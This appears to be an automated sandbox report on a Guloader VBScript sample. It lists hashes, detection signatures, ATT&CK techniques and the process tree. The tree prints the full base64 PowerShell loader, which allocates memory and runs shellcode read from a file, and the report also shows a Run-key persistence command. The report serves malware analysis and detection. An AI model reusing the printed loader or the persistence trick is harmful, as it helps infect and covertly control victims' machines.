Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
29-12-2024 05:20
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_3488a33e978dbb1cfb03897e5d717a0a116e8ec7aa4c237ae96892081e236c40.vbs
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
JaffaCakes118_3488a33e978dbb1cfb03897e5d717a0a116e8ec7aa4c237ae96892081e236c40.vbs
Resource
win10v2004-20241007-en
General
-
Target
JaffaCakes118_3488a33e978dbb1cfb03897e5d717a0a116e8ec7aa4c237ae96892081e236c40.vbs
-
Size
91KB
-
MD5
151e6b10a9fc5d46ef2fe47db9341299
-
SHA1
d45038f32b1c203004eb68dbcccb292329707314
-
SHA256
3488a33e978dbb1cfb03897e5d717a0a116e8ec7aa4c237ae96892081e236c40
-
SHA512
079660de624f04ce8d33c846e03f79c333adb038f0aacd3a22622d758fbb82ac7d50a6a6d09dfa52b8ce45b29863379b1c846525cdb1bec42edc06f668ed3382
-
SSDEEP
1536:6i/+uE7ixfTxj7/agTmpC5+MkpMBoCROhmIKyjr18mYFmSbm7wYsdtcwGLZXnzcP:vGB7ilT1/hoFpcRIKyP18mEbwaVihnzG
Malware Config
Signatures
-
Guloader family
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
description ioc Process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe ieinstal.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\Aargangsv = "%TORO% -w 1 $Oraclepa=(Get-ItemProperty -Path 'HKCU:\\SOFTWARE\\AppDataLow\\').Slusevrks;%TORO% -encodedcommand($Oraclepa)" ieinstal.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2244 powershell.exe 2680 ieinstal.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2244 set thread context of 2680 2244 powershell.exe 38 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ieinstal.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2244 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2244 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2244 powershell.exe -
Suspicious use of WriteProcessMemory 31 IoCs
description pid Process procid_target PID 2520 wrote to memory of 2404 2520 WScript.exe 30 PID 2520 wrote to memory of 2404 2520 WScript.exe 30 PID 2520 wrote to memory of 2404 2520 WScript.exe 30 PID 2520 wrote to memory of 2244 2520 WScript.exe 32 PID 2520 wrote to memory of 2244 2520 WScript.exe 32 PID 2520 wrote to memory of 2244 2520 WScript.exe 32 PID 2520 wrote to memory of 2244 2520 WScript.exe 32 PID 2244 wrote to memory of 1920 2244 powershell.exe 34 PID 2244 wrote to memory of 1920 2244 powershell.exe 34 PID 2244 wrote to memory of 1920 2244 powershell.exe 34 PID 2244 wrote to memory of 1920 2244 powershell.exe 34 PID 1920 wrote to memory of 2944 1920 csc.exe 35 PID 1920 wrote to memory of 2944 1920 csc.exe 35 PID 1920 wrote to memory of 2944 1920 csc.exe 35 PID 1920 wrote to memory of 2944 1920 csc.exe 35 PID 2244 wrote to memory of 2940 2244 powershell.exe 36 PID 2244 wrote to memory of 2940 2244 powershell.exe 36 PID 2244 wrote to memory of 2940 2244 powershell.exe 36 PID 2244 wrote to memory of 2940 2244 powershell.exe 36 PID 2940 wrote to memory of 2840 2940 csc.exe 37 PID 2940 wrote to memory of 2840 2940 csc.exe 37 PID 2940 wrote to memory of 2840 2940 csc.exe 37 PID 2940 wrote to memory of 2840 2940 csc.exe 37 PID 2244 wrote to memory of 2680 2244 powershell.exe 38 PID 2244 wrote to memory of 2680 2244 powershell.exe 38 PID 2244 wrote to memory of 2680 2244 powershell.exe 38 PID 2244 wrote to memory of 2680 2244 powershell.exe 38 PID 2244 wrote to memory of 2680 2244 powershell.exe 38 PID 2244 wrote to memory of 2680 2244 powershell.exe 38 PID 2244 wrote to memory of 2680 2244 powershell.exe 38 PID 2244 wrote to memory of 2680 2244 powershell.exe 38
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_3488a33e978dbb1cfb03897e5d717a0a116e8ec7aa4c237ae96892081e236c40.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\System32\cmd.execmd /c ECHO powershell.exe2⤵PID:2404
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBFAHQAaABlAHIAIABHAGkAZgB0AGUAcgAgAEgAZABiAGsAbgBlAGQAIABGAG8AZABlAHIAcwAgAGoAdQByAHkAZQBuAGEAZAByACAAUgBlAHMAaQAgAEoAZQBuAGwAYQAgAEUAawBzAGUAawB2AGUAcgBlAGQAIABBAHAAbwBsAG8AIABTAHAAZwBlAGwAcwBlAHMAYQAgAGcAbwBkAHQAZwByACAAUwBnAGUAcAByAG8AYwBlAGQAIABTAHQAbwByAGYAeQByACAAUQB1AGEAcwBpAGMAbwAgAEUAbABlAGMAdAByAG8AcABoACAAQQBmAHAAYQB0AHIAIABTAGkAawBrAGUAcgBoACAAQQBuAGUAcwAgAEcAYQBmAGYAZQBsAHMAZQBqAGwAIABEAGkAcwBjAGwAYQBpAG0AZQAgAEEAdgBhAG4AYwBlACAASwBvAG4AZwBlAGwAbwB2AGUAbgAgAHMAdQBiAG8AcgBkACAAUgBhAGQAaQAgAEwAaQB2AGUAcwB0AGYAIABCAGkAegBhAHIAcgBlAHIAaQAgAEQAcgBlAGoAZQBmACAAVABpAGQAcwBmAHMAdABoAHYAbAAgAA0ACgANAAoAJABpAEsARgAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAPQAiAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFMAdABvAGMAYQB6AHoAbwAoAGkAbgB0ACAATQBhAGQAbgBpAG4AZwBwAHIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAZgBsAGUAdAB2AHIALABpAG4AdAAgAEYAbABqAGEALAByAGUAZgAgAEkAbgB0ADMAMgAgAE0AYQBkAG4AaQBuAGcAcAByACwAaQBuAHQAIABQAGEAYwBlAHcAYQB5ACwAaQBuAHQAIABNAGEAZABuAGkAbgBnAHAAcgA3ACkAOwAnADsADQAKACQAUABhAGMAZQB3AGEAeQAwACAAPQAgACIAVwBpAG4AMwAyACIADQAKACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAGkASwBGACAALQBOAGEAbQBlACAAJABQAGEAYwBlAHcAYQB5ADAAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwANAAoADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAATQBhAGQAbgBpAG4AZwBwAHIAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAE0AbwBkAGUALAB1AGkAbgB0ACAAUwB0AGUAcgBpACwAaQBuAHQAIABvAHAAZgBpAG4AZABlAGwAcwAsAGkAbgB0ACAATQBhAGQAbgBpAG4AZwBwAHIAMAAsAGkAbgB0ACAAVAByAGkAbQBzAHQAbwBuAGUAdQAsAGkAbgB0ACAAVAB1AHIAYgBvAGoAZQB0ACwAaQBuAHQAIABzAHUAbgBkAGgAZQApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUgBlAGEAZABGAGkAbABlACgAaQBuAHQAIABGAGwAagBhADAALAB1AGkAbgB0ACAARgBsAGoAYQAxACwASQBuAHQAUAB0AHIAIABGAGwAagBhADIALAByAGUAZgAgAEkAbgB0ADMAMgAgAEYAbABqAGEAMwAsAGkAbgB0ACAARgBsAGoAYQA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABGAGwAagBhADUALABpAG4AdAAgAEYAbABqAGEANgAsAGkAbgB0ACAARgBsAGoAYQA3ACwAaQBuAHQAIABGAGwAagBhADgALABpAG4AdAAgAEYAbABqAGEAOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBPAGsAdABhAHYAZQByAHMAdQBuACAAQwBvAG4AZAB5AGwAbwBzAGgAagAgAEEAbgBnAGwAZQBkACAAVQBuAGgAbwBvAGQAaQBuAGcAdAAgAEoAZQBuAGIAcgB5AG4AIABBAGwAZABlAHIAbQBhAG4AZQBzACAAQwBvAGEAcwB0ACAAUwBpAGQAZAAgAEcAbABvAG0AZQByAGEAIABGAG8AcgBoAGEAbgBkAGwAaQAgAFAAdQBtAHAAZQAgAE8AdABoAGUAbABsAG8AawBhACAAVABhAGIAZQBsAG8AdgBlAHIAbAAgAFAAbwBzAHQAZQByAG8AbABhAHQAIABCAGUAcABhAGsAawBlAGQAZQBzACAAVAB2AGUAawAgAGEAdQBrAHMAIABQAGgAYQBjAG8AcABpAGQAZABlACAASABlAGsAcwBlAGsAdQBuAHMAdAAgAGYAaQBuAHQAbQBhAHMAawBlACAAYQBsAHUAbgByACAATQBhAGwAZQBlAHMAeQBtAGYAbwAgAEgAagBsAHAAZQBmACAAVwBlAGsAZQAgAFUAZABmAHIAaQBlAG4AZAAgAFkAZABlAHIAawAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAUwB0AHkAawBzAGEAIgAgAA0ACgAkAE0AYQBkAG4AaQBuAGcAcAByADIAPQAiACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACIAIAArACAAIgBcAEYAbABnAGEAcgB0AGkAZgAuAGQAYQB0ACIADQAKACMAUABhAHIAdABsAGUAdAAgAEoAdQB2AGUAbAByAGwAIABLAGoAZQByAGUAcwB0ACAARABlAHYAbwB0AGkAbwBuACAATgBlAHUAdAByAGEAbABpACAAdgBhAGcAYgBvACAAVQBuAGQAZQByAGgAbwBsACAAUwBvAHIAdABhACAAUwBvAHIAdABhACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAHIAYQB4AGUAdABpAG4AcwBpACIAIAANAAoAJABNAGEAZABuAGkAbgBnAHAAcgAzAD0AMAA7AA0ACgAkAE0AYQBkAG4AaQBuAGcAcAByADkAPQAxADAANAA4ADUANwA2ADsADQAKAA0ACgANAAoAJABNAGEAZABuAGkAbgBnAHAAcgA4AD0AJAB3ADoAOgBTAHQAbwBjAGEAegB6AG8AKAAtADEALABbAHIAZQBmAF0AJABNAGEAZABuAGkAbgBnAHAAcgAzACwAMAAsAFsAcgBlAGYAXQAkAE0AYQBkAG4AaQBuAGcAcAByADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBDAGkAZABlACAASgB1AHIAeQBtAGUAZAAgAEYAeQBsAGQAZQBrAGEAIABTAHQAYQB0AHMAcwBrAGEAIABUAHIAaQBwAGkAbgAgAEMAcgBvAHMAaABhAGIAIABMAGUAaQBzACAAUABlAHIAcwBvAG4AIABHAG4AbwBzACAARQBtAGEAYwBpACAAQgBsAHUAbQBlAGkAbgBkACAAUwBhAG0AbQAgAFAAbwBsAHkAZQAgAFUAbAB2AGUAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAdQBwAG8AIgAgAA0ACgAkAE0AYQBkAG4AaQBuAGcAcAByADQAPQBbAE0AYQBkAG4AaQBuAGcAcAByADEAXQA6ADoAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAJABNAGEAZABuAGkAbgBnAHAAcgAyACwAMgAxADQANwA0ADgAMwA2ADQAOAAsADEALAAwACwAMwAsADEAMgA4ACwAMAApAA0ACgAjAEsAbABlAGIAaQAgAEEAbgB0AGkAawAgAEsAcgBpAHQAaQBrAHAAdQBuAGsAIABNAHUAbAB0AGkAcwB1AGwAYwAgAFQAbwB0AGEAbAAgAEQAZQBtAG8AbAAgAEUAZwBvAGMAZQAgAFIAaABhAGIAZABvAHMAZgAgAHMAYQBuAGQAcwAgAEQAaQBnAG8AbgBhACAATgBlAGEAdABlAG4AYgBpAGIAIABVAG4AbwBiAGwAaQBnAGUAZAAgAEEAZgBzAHAAbgAgAEIAbwByAGcAIAB0AGoAYQB2AHMAZQBkAGUAawBhACAAVQBuAGQAaQBzAG8AYgBsAGkAZwAgAFIAZQBnAHUAIABEAGEAbQBlAGIAZQBrACAAUwBrAG4AaABlAGQAZQByAG4AZQAgAEgAagBlAG0AZwBpAHYAZQAgAGQAZQBmAGwAbwByACAAVQBiAGUAbABhAHMAdAAgAEEAZwB0AHYAcgAgAFAAcwBlAHUAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAaQBmAHQAZQByAHMAdQBzACIAIAANAAoAJABNAGEAZABuAGkAbgBnAHAAcgA1AD0AMAA7AA0ACgAjAEQAcgBpAHYAaAB1AHMAcAAgAEgAZQBhAGQAIABDAGgAcgBvAG0AbwBwACAARgBvAHIAZgByAHkAcwBuACAAUwBwAHkAZABrAGEAcwAgAEkAbgBkAHIAZQB0AG4AaQBuAGcAIABUAGUAcgBtAHcAaQBzAGUAcAAgAE0AZQBhAHMAbABlAGQAbgBlACAAbgBpAHQAcgBpACAARQB2AGUAbgB0AHkAcgBlAHIAZQAgAFMAdQBzAGEAbgBlAGUAbQBvACAAUQB1AGEAcgB0AGUAIABOAG8AbgBjAG8AbgAgAFUAbgB0AHIAaQBhACAARgBvAHIAcwBrACAASwBvAG0AbQBhAG4AIABFAGYAdABlAHIAcwBpACAAQQByAGMAaABpACAAUwBlAG0AaQBjAHIAIABXAGEAeQBiAGUAcgByAHkAcwAgAEkAbgBzAG8AZgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAUgBlAGIAYQByAGIAYQB0ACIAIAANAAoAWwBNAGEAZABuAGkAbgBnAHAAcgAxAF0AOgA6AFIAZQBhAGQARgBpAGwAZQAoACQATQBhAGQAbgBpAG4AZwBwAHIANAAsACQATQBhAGQAbgBpAG4AZwBwAHIAMwAsADIAOQA3ADgAMwAsAFsAcgBlAGYAXQAkAE0AYQBkAG4AaQBuAGcAcAByADUALAAwACkADQAKACMAVAByAG8AbABkACAARgB1AG4AaQBjAHUAbAAgAE8AcABzAGsAcgB1AG4AIAB3AGEAcwBwAGkAbgBlAHMAcwBiACAARABvAHcAbgBzAGgAaQBmACAARgByAHkAdABsAGUAcwBmAG8AcgAgAEgAbgBnAGUAYgByACAAUwBjAGgAbwAgAFAAZQBuAHQAYQBjACAAVABpAGwAcwB0AHIAYgBlAGwAIABBAHYAZQBzAHQAYQBuAGMAIABQAGEAbgBlAGcAIABWAGkAcgBrAGUAbABpACAAUgBvAG8AdAB3AG8AcgBtAG8AIABDAG8AbQBwAG8AbgBlAG4AdABpACAAUgBvAGMAaABlACAAcwBsAGEAbgAgAEoAYQBrAHUAbgBoAG8AdgBlAGQAIABCAHIAbgBkAGUAbgB1ACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBVAG4AcABpAGwAbABhAGcAZQBkACIAIAANAAoAWwBNAGEAZABuAGkAbgBnAHAAcgAxAF0AOgA6AEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAJABNAGEAZABuAGkAbgBnAHAAcgAzACwAIAAwACwAMAAsADAALAAwACkADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBSAGUAbQBhAG4AZABtACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEIAZQBsAHkAcwBuAGkAbgBnACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAdQByAGkAZgBpAGUAcgBuACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEIAZQBrAGUAbgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAHIAaQBnAGgAdABhAGIAbABlACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAGgAaQBqAGEAYwBrAGUAcgB1AG4AIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAUwB0AGEAcgB0ACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAaAB1AGQAZABlAHIAaQBuAGcAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAYgBvAHMAdABhAGwAcgBlAHAAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATQB1AHMAagBpAGQAbQBpAG4AYQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBOAHUAbQBtAGUAcgBpAG4AdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAHUAcABlACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEEAYQByAGUAbABhAGQAZQAiACAADQAKAA=="2⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\krcicdmv.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES954E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC954D.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2944
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jo5gcvlf.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9676.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9675.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2840
-
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"3⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2680
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Modify Registry
1Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f05168d1621fefd01e97d784544269b6
SHA11b922ef8df945b88244402024ac96b1d1d30c393
SHA256d7137432dd311c4a99a906873a3710f4b723af7c07b515e54c3d4f39081639e0
SHA512e891bff4361addbfd741b191321802136358eefac2ab4faffee8a412df30ec13c1819e46c0eda34785f4ad82378bda12a68db6cb82c17ac5381d7c39e4a3fdf2
-
Filesize
1KB
MD5804ca09b0d49de4aad4001ae72df8b2e
SHA19f005e63db5eae13acfd887cfc9bbf289a8eee31
SHA25676e2ea64ec5264cd47e99b59d143370a9b2942f64de660db1e0fcbbe4af6067b
SHA51232204e5dccb0d69f564b28199c32991a933b3893579496bff86a925bdafe9bfa8739ef48d75f4d8d8fa9965de290e7c66ca788b008637f4f1b693b995cb52dce
-
Filesize
3KB
MD5a75783625668704e5681871fad329b4e
SHA1c6ccbeab693ed3f2a28dcefc008f7ce6b0ca310c
SHA2562573a242bc78f22a9e1afb7e9cbfcf93af6e54b004d7224eec936c4b39db73fc
SHA512045c5c0fe51722284d4d10ace7a562c9be731746bba634cfc14743912df4d81404a73af92f55fde79dfec81ce691765a2dfe7cbfb53bb0e362b2c73e767c4a09
-
Filesize
7KB
MD531f13b30ffacb745eff9f1f134e2e1ee
SHA1b2eb8b3266d360d889f7751cdfb935a06d2689cc
SHA256ddfcc66a82c9e58667bb8623681b4fed1f67a90891ad31a5ea320bae10f05ec5
SHA512d3a04a076ac6776225e6370e6a4c2df34b245834caa8b836675eb8775300881dc5f9c561dc36bdb20825a5c48504ec90974795d47a3e4f68d69968a32f64912a
-
Filesize
3KB
MD513b7f1d2be9446c285f594ec7aebc4bb
SHA13a0e8f02c4487051f4476b7cc4e4b644b04df68c
SHA256fbe524e09b0a2fa900e03dafc19130752e9e2e88397818d76d706f94f4d954c0
SHA512c1cf6b02f4ab7afc82bf82d43097951e4ace1b6d1e55b468bd8800b19995bf98c860f9ed376e49c59c7923294209393dd0329b918d5cdc41f958a10ae1d9dae2
-
Filesize
7KB
MD5bdcbeaeeea839170c5d505c085ee749d
SHA185393697a3d5faad225a2ea46def6b3b963ce912
SHA25673de1147eb27398993db4585bd6cbfb7939efb05e4d6ee53abcb0762f4b84bed
SHA51285cb44ff0465ee004d975f123e2af31a437508e8fa8beaf09914517f6d1613abe858154443af1eb0033e198aa3ea19a2b66411847755a4b63d897def6e2b26f2
-
Filesize
29KB
MD56a44848f3d6612e8dcf87e2412938989
SHA1ca4e8e5f9a48274285ef5f45687c1b3abe19615b
SHA256e84b3029900d2a23252863017a60e42cd3a543ff8963a95ff0d9ada2ca4449b0
SHA51262604b5c148e7775abd9443b22004ac7fd9fea3a5ab68ed2f48c18ee02871282b735f00fec995c8c4df178ba73834e8fad8ed4b01121f5c8ff4435a752aaf64f
-
Filesize
652B
MD548a84446367c41b4040aaf3afe5b9adb
SHA1b8ade55ae24cb5f4acc81febaa5617f6be04c1cd
SHA256355ca6cabc9be57b9445d93d0189ad53dd14bed4e28ecdae4e96e62d8a28bd71
SHA512288b3a7afae7e03a6b0fce4b0f2b380747ce49b76b120bbc5aaecb4c26f0e0d1b8c810985825230ef125f5c486cb16f8611639a20ad86a466c764b3d4d4e3ddc
-
Filesize
652B
MD53912114cc406e62a7152e84634b8cdce
SHA194a0a416a74b155f8ec38c6c7e108f1a0f4a06bd
SHA256153941d49361e3dcb9522a3aae6a68b35131cea1820d635e3f6cd7af5a028e6f
SHA512cd83f4339691b4c69fe35ed784cd2b551385b1a8978fac97997e02b886675ed92a798367a142597e74abd21d8db41d7effd9475a756aa4904d88767cfaac8b22
-
Filesize
503B
MD5ef368eb363272e6d4ea5b1859e789fe6
SHA10f69004d7b24f3c1f2b0faa219105cce6f9dbc8e
SHA2569de8875ab310a4cf0640d5cfeda93c83c6684df4fae40e5da036009734086a59
SHA5120db4930e4f9e4685bfdab1c5f2e7923012f27ee6de7630e989ea0069b6b561be01d8b008cad5f50233c5900e64646d18976389f234817af8ab077b0dc86c44d4
-
Filesize
309B
MD5efa6f6b1e55a14e514def51ae378bbfd
SHA1ed63e99adabf23b53b87e3e23b34b9f02b00976b
SHA25668cdc9d19e52bb19c1540631347a88edf6dfdbbd600bb729df3db389fc4e3a38
SHA512f72b2d9dd42e5f84678d798fc25513a99edbb1564ba613c3bec93482e705b669505202ce1b1cd55862802cfd0eeefc34b2fe14812b805daf97e46d78d3454514
-
Filesize
312B
MD51f5f578f802a7fdec720af4972875e7c
SHA1ededcc25c3e56d7892b094d989114514d3d56fc2
SHA256bef779b96488d834f2dca6fb5ca98f41471ebdc48051c984af33cf126a238b46
SHA512240b8ad8a78c42779d138f370ff91151ac68cdf60fa946b7123641e82eb2b467a82db990efdbfe684f397280bce07462e9f966bd1b91e46176e5c50e05f2d3e4
-
Filesize
309B
MD54d67eff37a9445e9ec3abed7eb3ef655
SHA19956df6989f88c3afd860f95dbfabdf4be51c47c
SHA256000f3e845034b6e0ae6999bd355b99908ac7211a6929060968cf3299da4e44ba
SHA51207ca633ca8526b9dd25b91921bdea55185218ad9a03acd061b43a79ac6bcaba22a9c73e9997f0ecc6fb4d1fc11b9e5084a1b39b85f791a31babfdfe5d150b60c